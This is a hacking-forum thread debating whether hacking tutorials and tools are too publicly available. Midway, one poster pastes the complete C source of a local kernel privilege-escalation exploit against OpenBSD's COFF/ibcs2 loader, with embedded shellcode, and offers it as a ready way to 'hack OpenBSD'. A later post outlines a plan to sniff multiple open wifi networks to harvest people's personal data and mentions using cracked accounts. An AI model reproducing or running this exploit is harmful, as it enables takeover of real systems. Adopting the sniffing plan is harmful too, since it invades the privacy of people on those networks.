When too much is too much?

[uid0]

Let's talk about the lack of information control regarding to hacking and underground related stuff...

This is just some nounces comming from my keyboard but it may be what others think, basically, the question in play is "Hacking/Underground resources (pappers, how-tos, do-it-yourself, tools and so on) should be so publicaly exposed?"

How many hacking communities do you know? How many hacking boards do you know? don't answer is a rethorical question

Hacking communities are created everyday, it's easy, find some webhosting, place a phpBB, IPB or vBulleting on it and start to make posts

Next you need t00lz, are there any? a ton, even in free hostings services like freehostia or blogspot, php/asp/jsp shells, sql injection tools, XSS, fuzzers, webcrawlers, RFI/LFI scanners, DoS tools, md5 hash crackers, port scanners, sniffers, brute force automatization for login forms, vulnerability scanners...

You've a forum, tools and now what? you need to know how to use the tools but fear not, there are a zillion of pappers running around all over the net

Take any papper, grab a bunch of tools and be happy, y0u'r3 a h4xx0r! ... orly?

All the above is true as we know but what are the consecuences of all this information expose? when too much is too much?

I always wake up, look for coffee and load the browser to read the news and is amazing the amount of security problem reports that happen to be linked to hacking, I ain't talking about the true meaning of the word 'hacking' whatever such meaning could be, but the media term definition

There's XSS all over the place, defacements, boxes ownd, databases breachs, identity thieves, DoS attacks, admins crying....so sad

All this is done by hackers? nah, they're interested in search for UFOs at the pentagon to then be extradited to US and face 60 years in jail

So, ain't hackers, who then? who is responsable for all this? Here's where the problem begins, everybody is capable ^^ you don't have to be smart anymore to do this stuff, the information is publicaly around, the access to tools, what do you need to become a 1337? a browser and internet access

Even when true spirit based hacking communities hate skiddies, today they're are the ones making mess all over the network but to be fear, it isn't their fault, information about hacking is too wide open this days when it shouldn't be

Myself, as many others, believe in the free access of information, is good, is like the antitrust movie "knowledge belongs to humans", you should have access to information whenever you want it but ask your self this....is everybody worthy of such access? does everybody deserve it?

With big power comes big responsability and a lot of people don't understand that, however, such people is provided with everything they need to bring a server down to its knees, wtf?

I think that at some point true security researches and hacking communities should take care of this problem and add some layer of control to the information that's being exposed so only the people that really knows how to make good use of this information are the ones with access to it; today, much people that has such access don't deserve it, don't know how to use the information correctly and that's is just wrong

And yes, if you're wondering if I didn't take my medication you're right, and my coffee had too much suggar

[leechy9]

i agree dude, i have to say that there are too many skiddies that think their amazing at doing this "hacking" when all their doing is using a program that was made by the real elite group of hackers to make their job a little easier. i have to say that nmap, and nikto are nice tools. but you shouldnt rely on them, you should know how to scan for ports yourself. i have to say that skiddies ruin everything because of the fact that their making everything be more secure due to the fact that they attack random stuff for no reason. DOWN WITH THE SKIDDIES!

[uid0]

Erhhh.....that is not my point

Actually, based in what I said, skiddies won't even exist if information like what I addressed wasn't so publicaly open

[Still_Learning]

I dont beleive in controlled information. Its allready controlled pretty much anyways, the real elite groups are not going to release the good programs until they have a new one thats way better. So the elite will always have a better program then regular people just learning to hack useing some hacking program they found on google, because they are the ones creating the programs.

Most people dont take the time to really learn how to use all the stuff anyways, if they put the time and effort maybe thats a next gen sys-admin on the way that will develop a better script then the one they downloaded off google and share it..

[Big-E]

What do you suggest? Attack skid sites?

[DNR]

I get what he is saying, When is too much information too much.

Don't forget you are just touching the tip of the iceberg there. Yea, there are a lot of tuts and tools to cause trouble. But really, the good stuff is not always available. In this forum, we do have a VIP section, thats for the next level of noobs (those that make it! ) In that section we, the staff, feel more comfortable sharing good shit that we find or create - among those that we feel have achieved the level of responsibility.

Even in the public forums, a lot of us stopped helping with some details or specifics - the Federal hacking laws, civil lawsuits, those are the reason that the internet is not really free anymore. To really become elite you have to know a lot more than a few tuts and a neat tool. A true elite is one that actually tried it hands-on and can explain what happened.

I am not worried about the tools and tuts available for skiddies - thats job security for the real IT/CISSP. Its like those punks on the street, they think that a pistol makes them a marksman - until they end up drawing a gun on a real pro

DNR

[uid0]

@itzm3:
Good points, although I don't think that it really matters if there's a elite tool and a public tool, I mean, imagine that there's this elite with a DoS tool that only he knows, it's an amazing app, better than anyother...on the other hand there's this normal guy who found a common very well known DoS tool

Now, the elite elite use his unknown tool and brings a server down, the regular guy uses its very well known tool and also brings a server down, what does that tell? the regular guy accomplished what he wanted and didn't need an elite tool, in the server side, the damage (if any) is equal as if the elite tool was used or a regular one.

@Big-E:
nah, don't think that's a solution nor that I'm looking for it

I think that it will be better if, for instance, a security expert says "well, I will disclose this information but not to everyone, just the ones that will know to make good use of that information"

Other thing that could be considered is that the information could be disclosed in a way that isn't usable by those who don't know one subject, for example, think on a person who make public an exploit but with a breaked code so not everyone can use it, just the ones who really now about the subject

@DNR:
Yep, you get my idea

I agree with you when you say that ins't enough just read a few pappers and have a good tool and yes, this is more a concern for the IT/CISSP people, however, I can't avoid thinking on this, what if a non elite grab a tut about RFI, download one simple tool to do the job, it was lucky enough to find an exploit for an osCommerce, he tested it, it happens to worked and because he isn't an elite, all he did was a defacement (remember, this is just an example)

The osCommerce was down (because of the defacement) by lets say five minutes, what is the problem in that? in a system like an osCommerce, five minutes is money lost

So, in the end, the non elite guy didn't need to be an elite because it was easy to find what he need to make the osCommerce lost money

Is just an example for what I'm trying to say with "when too much is too much" and as DNR said, I'm talking about when information is too much.

My post was about sharing my thoughs about how easily is to get information about things that might be a little more private, so I want to make clear that I'm not looking for a "die to the skiddies" post, I ain't talking about skiddies being good or not, I'm talking about information access, nothing more nothing less

[str33tl0rd]

i strongly agree with uido....he is making the right point....there are people out there who dont really deserve this information......after they know how to do it they grow a dick and there they are "hackers"...for fuck sake you not doin nothin so special.....

i think DNR has really explained what udoi meant.....

[Lyecdevf]

All this is done by hackers? nah, they're interested in search for UFOs at the pentagon to then be extradited to US and face 60 years in jail

Good point! I was thinking about roughly the same thing and if you had not brought it up I would eventualy bring it up my self.

There is so much nonsense on the internet about hacking and very few things that are in any way usefull. If you check all these forums about hacking there really is not a lot of usefull information about penetration and the such. I for instance have never seen any thing related to bypassing a firewall. I was thinking of joining some general computer related site to get information about general computer stuff but than why would I do so? Hacking sites need the posts and there is not much else that goes on them any way! Am I right!?

Now I am not critisizing this site. This site is great because we have a great admin team and it keeps improving. I am just saying that when you join any given hacker site your quest to find information regarding hacking has just begun. In no way expect that any thing is going to be given to you on a silver plate.

[uid0]

Indeed Lyecdevf, I ain't critisizing suck-o neither this site is great and so are many others hacking communities, but as anything in life there are the bad eggs also and isn't just forum boards, there are blogs, IRC and such where information is passed (actually leeched xD) without any kind of control on who are recieving the info

In any case, thanks for all the comments and opinions, I didn't though I will recieve any ^^

[pseudo_opcode]

well,
I agree the info accessible nowadays is too much,and enough for anyone to create chaos, but from my personal exprience, the real meat is still not accessible easily,
with the info available, ok you can attack the weaker targets, or servers monitored by lazy admins, but if you want to seriously harm someone, its not that easy.

After a level, there comes a stage where information is not so obvious, you have to find hints and clues, about how to do stuff, they dont have books like, begginers hacking, intermediate... advanced hacking, begginers hacking are just case studies, ok once a dude found that unsanitized input can be used to do things which are not desirable, the whole world follows it, it becomes a hacking way, a technique! There we go, sql injection tutorials and stuff, they just teach you how to do what to do, now its so easily available it has a positive site too, the sincere sysadmins will be up to date, they will protect themselves from the these known attacks,

well leave knowledge, these antivirus companies, they hire their own virus writers too, if there has to be a hero, there has to be villains, how many virus writers have you heard of, why is it so that sometimes only one company has a patch for a product and it takes a while for others to catch up,

similarly a lot of security products and people will lose their jobs if there arent skiddies, thanks to them, i got a job to secure the code of a site, thanks to a lame skiddie who hacked him. It made him hire me.

I know its a problem but one can defend themselves from these attacks,
but if a sincere hacker wants access for any reason, there's no way one can stop, if a system is ridiculously secure, he will target the weakest link, which are humans, he will get in, but it depends how badly he wants it, i worked in the national informatics center, the cyber security division, that monitors all the military, government, police sites, the system is virtually unhackable(maybe not), but the employees are the weakest links, dont worry wasnt one of them.

They say we have 10 firewalls, hardware,software, and encryption protocols, i would say why do you even need to break firewall,
as for the tutorial about bypassing a firewall, let me ask, if you want to enter an restricted area, would you break the wall? or try to sneak in from door, window or vents?
Firewall would happily let traffic in, if its told to,
suppose a server is running https server, and the traffic is only allowed on port 443, i wont care about firewall, i wont care about encryption or public or private key, i just know that i get in from port 443, not what can i do to the system depends upon the server,

i dont believe that something like safe application exists, if you call it safe, it means that at the moment there are no known bugs,
how many of you elite hackers have fired up debuggers to inspect the running applications, how many of you inspect the code, use fuzzers, and actually read the complete code (in case of opensource) to find out if the programmer has made a mistake,
trust me, when a company like microsoft with highly paid programmers and very good brains can ship 65000 known bugs with a version known for its stability, why cant others leave bugs, opensource has an advantage that people always work on improving stuff, but that doesnt mean that there aint no bugs,

how do one teach hacking where you need to master,things from how programs are paged in memory, to indepth knowledge of say tcp/ip protocols, like what is a stucture of a datagram?

i'll give you the exploit for stack overflow 0day in OpenBSD, one of the safest OS till date, i dont know if it has been patched, but it was not until some time ago

Code: Select all

#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/sysctl.h>
#include <sys/signal.h>

/* kernel_sc.s shellcode */

unsigned char shellcode[] =
"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe"
"\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89"
"\x42\x04\x8b\x51\x14\x89\x42\x0c\x8d\x6c\x24\x68\x0f\x01\x4f\x04\x8b"
"\x5f\x06\x8b\x93\x00\x04\x00\x00\x8b\x8b\x04\x04\x00\x00\xc1\xe9\x10"
"\xc1\xe1\x10\xc1\xe2\x10\xc1\xea\x10\x09\xca\x31\xc9\x41\x8a\x1c\x0a"
"\x80\xfb\xe8\x75\xf7\x8d\x1c\x0a\x41\x8b\x0c\x0a\x83\xc1\x05\x01\xd9"
"\x89\xcf\xb0\xff\xfc\xb9\xff\xff\xff\xff\xf2\xae\x8a\x1f\x80\xfb\xd0"
"\x75\xef\x47\x31\xc0\x57\xc3";

/* iret_sc.s */

unsigned char iret_shellcode[] =
"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe"
"\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89"
"\x42\x04\x8b\x51\x14\x89\x42\x0c\xfa\x6a\x1f\x07\x6a\x1f\x1f\x6a\x00"
"\x5f\x6a\x00\x5e\x68\x00\xd0\xbf\xdf\x5d\x6a\x00\x5b\x6a\x00\x5a\x6a"
"\x00\x59\x6a\x00\x58\x6a\x1f\x68\x00\xd0\xbf\xdf\x68\x87\x02\x00\x00"
"\x6a\x17";

unsigned char pusheip[] =
"\x68\x00\x00\x00\x00"; /* fill eip */

unsigned char iret[] =
"\xcf";

unsigned char exitsh[] =
"\x31\xc0\xcd\x80\xcc"; /* xorl %eax,%eax, int $0x80, int3 */


#define ZERO(p) memset(&p, 0x00, sizeof(p))

/*
 * COFF file header
 */

struct coff_filehdr {
    u_short     f_magic;        /* magic number */
    u_short     f_nscns;        /* # of sections */
    long        f_timdat;       /* timestamp */
    long        f_symptr;       /* file offset of symbol table */
    long        f_nsyms;        /* # of symbol table entries */
    u_short     f_opthdr;       /* size of optional header */
    u_short     f_flags;        /* flags */
};

/* f_magic flags */
#define COFF_MAGIC_I386 0x14c

/* f_flags */
#define COFF_F_RELFLG   0x1
#define COFF_F_EXEC     0x2
#define COFF_F_LNNO     0x4
#define COFF_F_LSYMS    0x8
#define COFF_F_SWABD    0x40
#define COFF_F_AR16WR   0x80
#define COFF_F_AR32WR   0x100

/*
 * COFF system header
 */

struct coff_aouthdr {
    short       a_magic;
    short       a_vstamp;
    long        a_tsize;
    long        a_dsize;
    long        a_bsize;
    long        a_entry;
    long        a_tstart;
    long        a_dstart;
};

/* magic */
#define COFF_ZMAGIC     0413

/*
 * COFF section header
 */

struct coff_scnhdr {
    char        s_name[8];
    long        s_paddr;
    long        s_vaddr;
    long        s_size;
    long        s_scnptr;
    long        s_relptr;
    long        s_lnnoptr;
    u_short     s_nreloc;
    u_short     s_nlnno;
    long        s_flags;
};

/* s_flags */
#define COFF_STYP_TEXT          0x20
#define COFF_STYP_DATA          0x40
#define COFF_STYP_SHLIB         0x800


void get_proc(pid_t, struct kinfo_proc *);
void sig_handler();

int
main(int argc, char **argv)
{
  u_int i, fd, debug = 0;
  u_char *ptr, *shptr;
  u_long *lptr;
  u_long pprocadr, offset;
  struct kinfo_proc kp;
  char *args[] = { "./ibcs2own", NULL};
  char *envs[] = { "RIP=theo", NULL};
  //COFF structures
  struct coff_filehdr fhdr;
  struct coff_aouthdr ahdr;
  struct coff_scnhdr  scn0, scn1, scn2;

   if(argv[1]) {
      if(!strncmp(argv[1], "-v", 2)) 
              debug = 1;
      else { 
              printf("-v: verbose flag only\n");
              exit(0);
            }
    }
 
    ZERO(fhdr);
    fhdr.f_magic = COFF_MAGIC_I386;
    fhdr.f_nscns = 3; //TEXT, DATA, SHLIB
    fhdr.f_timdat = 0xdeadbeef;
    fhdr.f_symptr = 0x4000;
    fhdr.f_nsyms = 1;
    fhdr.f_opthdr = sizeof(ahdr); //AOUT opt header size
    fhdr.f_flags = COFF_F_EXEC;

    ZERO(ahdr);
    ahdr.a_magic = COFF_ZMAGIC;
    ahdr.a_tsize = 0;
    ahdr.a_dsize = 0; 
    ahdr.a_bsize = 0;
    ahdr.a_entry = 0x10000;
    ahdr.a_tstart = 0;
    ahdr.a_dstart = 0;
   
    ZERO(scn0);
    memcpy(&scn0.s_name, ".text", 5);
    scn0.s_paddr = 0x10000;
    scn0.s_vaddr = 0x10000;
    scn0.s_size = 4096;
    scn0.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3); 
    //file offset of .text segment
    scn0.s_relptr = 0;
    scn0.s_lnnoptr = 0;
    scn0.s_nreloc = 0;
    scn0.s_nlnno = 0;
    scn0.s_flags = COFF_STYP_TEXT;

    ZERO(scn1);
    memcpy(&scn1.s_name, ".data", 5);
    scn1.s_paddr = 0x10000 - 4096;
    scn1.s_vaddr = 0x10000 - 4096;
    scn1.s_size = 4096;
    scn1.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 4096; 
    //file offset of .data segment
    scn1.s_relptr = 0;
    scn1.s_lnnoptr = 0;
    scn1.s_nreloc = 0;
    scn1.s_nlnno = 0;
    scn1.s_flags = COFF_STYP_DATA;

    ZERO(scn2);
    memcpy(&scn2.s_name, ".shlib", 6);
    scn2.s_paddr = 0;
    scn2.s_vaddr = 0;
    scn2.s_size = 0xb0; //HERE IS DA OVF!!! static_buffer = 128
    scn2.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 2*4096; 
    //file offset of .data segment
    scn2.s_relptr = 0;
    scn2.s_lnnoptr = 0;
    scn2.s_nreloc = 0;
    scn2.s_nlnno = 0;
    scn2.s_flags = COFF_STYP_SHLIB;

    offset = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 3*4096;
    ptr = (char *) malloc(offset);
    if(!ptr) { 
                perror("malloc");
                exit(-1);
    }

    memset(ptr, 0xcc, offset);  /* fill int3 */

    /* copy sections */
    offset = 0;
    memcpy(ptr, (char *) &fhdr, sizeof(fhdr));
    offset += sizeof(fhdr);

    memcpy(ptr+offset, (char *) &ahdr, sizeof(ahdr)); 
    offset += sizeof(ahdr);
        
    memcpy(ptr+offset, (char *) &scn0, sizeof(scn0));
    offset += sizeof(scn0);

    memcpy(ptr+offset, &scn1, sizeof(scn1));
    offset += sizeof(scn1);

    memcpy(ptr+offset, (char *) &scn2, sizeof(scn2));
    offset += sizeof(scn2);

    lptr = (u_long *) ((char *)ptr + sizeof(fhdr) + sizeof(ahdr) + \
           (sizeof(scn0) * 3) + 4096 + 4096 + 0xb0 - 8);

    shptr = (char *) malloc(4096);
    if(!shptr) {
                perror("malloc");
                exit(-1);
    }
    if(debug)
      printf("payload adr: 0x%.8x\t", shptr);

    memset(shptr, 0xcc, 4096);

    get_proc((pid_t) getppid(), &kp);
    pprocadr = (u_long) kp.kp_eproc.e_paddr;
    if(debug)
      printf("parent proc adr: 0x%.8x\n", pprocadr); 

    *lptr++ = 0xdeadbeef;
    *lptr = (u_long) shptr;

    shellcode[5] = pprocadr & 0xff;
    shellcode[6] = (pprocadr >> 8) & 0xff;
    shellcode[7] = (pprocadr >> 16) & 0xff;
    shellcode[8] = (pprocadr >> 24) & 0xff;

    memcpy(shptr, shellcode, sizeof(shellcode)-1);

    unlink("./ibcs2own");
    if((fd = open("./ibcs2own", O_CREAT^O_RDWR, 0755)) < 0) {
                perror("open");
                exit(-1);
        }

    write(fd, ptr, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0) * 3) + 4096*3);
    close(fd);
    free(ptr);

    signal(SIGSEGV, (void (*)())sig_handler);
    signal(SIGILL, (void (*)())sig_handler);
    signal(SIGSYS, (void (*)())sig_handler);
    signal(SIGBUS, (void (*)())sig_handler);
    signal(SIGABRT, (void (*)())sig_handler);
    signal(SIGTRAP, (void (*)())sig_handler);

    printf("\nDO NOT FORGET TO SHRED ./ibcs2own\n");
    execve(args[0], args, envs);
    perror("execve");
}

void
sig_handler()
{
   _exit(0);
}

void
get_proc(pid_t pid, struct kinfo_proc *kp)
{
   u_int arr[4], len;

        arr[0] = CTL_KERN;
        arr[1] = KERN_PROC;
        arr[2] = KERN_PROC_PID;
        arr[3] = pid;
        len = sizeof(struct kinfo_proc);
        if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
                perror("sysctl");
                fprintf(stderr, "this is an unexpected error, re-run!\n");
                exit(-1);
        }

}

now you cant complain that suck-o didnt teach you how to hack OpenBSD, guys i just did,

What all do we teach you, this is a community for us to learn and contribute, if you show us you're serious and trustworthy, we'll invite you to VIP area, how can you say suck-o didnt tell you how to bypass firewalls, i never felt the need to bypass a firewall, and if one day i do, i will know what to do and how to do, i dont know how right now,but one thing i know is that i will find a way, and we believe in teaching you how to think, than giving you canned info,

regarding too much info, i still think, it has more to do with human intellect, these tools can damage upto a certain point, the real threat begins when these skiddies get serious and do hardwork, we still have way more info out there than you guys know, but these guys dont know how to utilize it, the few who do, dont need to do it

[uid0]

Great response pseudo_opcode

Believe it or not, this post have been great for me as differents opinions come by, maybe for many of you it was just another debating post but I've gained a lot from it.

Although I still think in the lack of control of the information, at the same time I've realized that this is just at one level, and even if there's chaos at it, there's a still too much to consider for this lack of control.

I basically took every opinion and analyzed it, in some of them I though the same in others not quite, however, all that made start to think at what level this lack of control of the information is a problem.

I see security as much wider field now and this helped me to analyze at what spect the expose of information can be considered as problem and even when it is a problem, is doesn't seem to be so widespread as I first though it

Anyway, I started this post because I was concerned about the popularity that this kind of info was taken and I'm still are at some point but I think I failed to see the security field as wider as it is at least regarding to the basic idea of my post and I can say I'm very grateful for all the opinions you gave because it helped me to consider that, so in the end I gained more than I though from this post so my most sincere thanks for you all and the opinions you shared

Its just so cool when you see that there's so much to learn

[G-Brain]

now you cant complain that suck-o didnt teach you how to hack OpenBSD, guys i just did

Teaching people how to hack OpenBSD by giving them someone's exploit is like teaching people C by giving them the compiler source.

[pseudo_opcode]

now you cant complain that suck-o didnt teach you how to hack OpenBSD, guys i just did

Teaching people how to hack OpenBSD by giving them someone's exploit is like teaching people C by giving them the compiler source.

Exactly thats my point, well like lyecdevf said,

If you check all these forums about hacking there really is not a lot of usefull information about penetration and the such. I for instance have never seen any thing related to bypassing a firewall.

Well first of all, no offence Lyecdevf, but bro, no one can be so specific, like giving you BSD's exploit is not helpful at all, you would rather want to learn about, buffer, heap overflows, off-by-one's than just getting the exploit code, similarly, you would want to learn more about protocols, RFCs for them, and how firewall works, rather than a solution to bypass firewalls, its association with OS, buddy, if you dont even know how something works, how can you find bugs?

@G-Brain, man what you said is obvious, my message was the same, i think i m not clear enough, or from now i should say things directly, damn my english!!!

[Lyecdevf]

To start of I am glad that we are having this converstaion. I beleive that today I am going to be able to express for the firt time since I began hacking my views about hacking and how I view this exciting field.

The first post that I made in this thread was in some cyber caffe on my sisters laptop. It was getting really hot *like it is right now* so I rushed through it and I believe that I did not develop my thoughts well enough. Still I am glad that some one liked it!

Enough with that! Lets elevate this debate to new levels!

I have been browsing various hacker forums for more than two years now. Which is not a lot and I am not saying that it is but I reckon it is enough for me to give my oppinion of them.

I have learned a lot during this time. I appreciate the knowledge that I have acquired during this time. I am now a linux user and I have a basic knowledge about computers and hacking. What I do feel is amis among the various hacker forums is any real discussion about penetration computers and the such. For instance a while ago I posted on another forum some pics of me port scanning a computer of mine on LAN which has ZoneAlarm installed. The firewall showed logs of the port scan! I wanted to continue with this employing various exploits and changing various things on the remote computer until I would get a sucessfull hack! Until now I did not find the the time and the will to do it but I would appreciate it if some one else did it and documented the process so that any one could understand. So far I have not found much of this on hacker forums. Despite that this would be so relavant. Instead there is a lot of computer disscussion about various things. I could get that too from some general computer forum.

I am not saying that this is the case with all hacker forums out there. Some are good and this one is good as well and I am comfortable into any dirrection that this forum goes!

I for instance have been on our download sections only twice. I do not have any really need for any of those tools.

I am trying to develop my own techniques to get to peoples personal info. One of the ideas I am working on is to log into multiple unprotected wifis and sniff them to get personal data and information. I am still unsure how to go around doing that. I have a good wifi antenna but how to have multiple IPs on my machine is still some thing that I am looking into. Next I would have to some how configure wireshark to sniff all of them and automatically save the logs every hour. So quite a complex task if you see but it is some thing I find it reasonable to work on.

If I was to make one last point it would be the fact that I have never seen any cracked accounts posted on any hacker forum. I was for a while a memer of some warez site that had a hacking section. There ever so often cracked yahoo, myspace and other accounts were posted. I had fun with those. Now the site does not exist any more and I for one have no idea where people got those cracked accounts. I am sure that no every one went cracking them!

Any way these are my two cents on the subject. I do not care so much for firewalls and the such but I did expect more hacking discussion and less general computer stuff.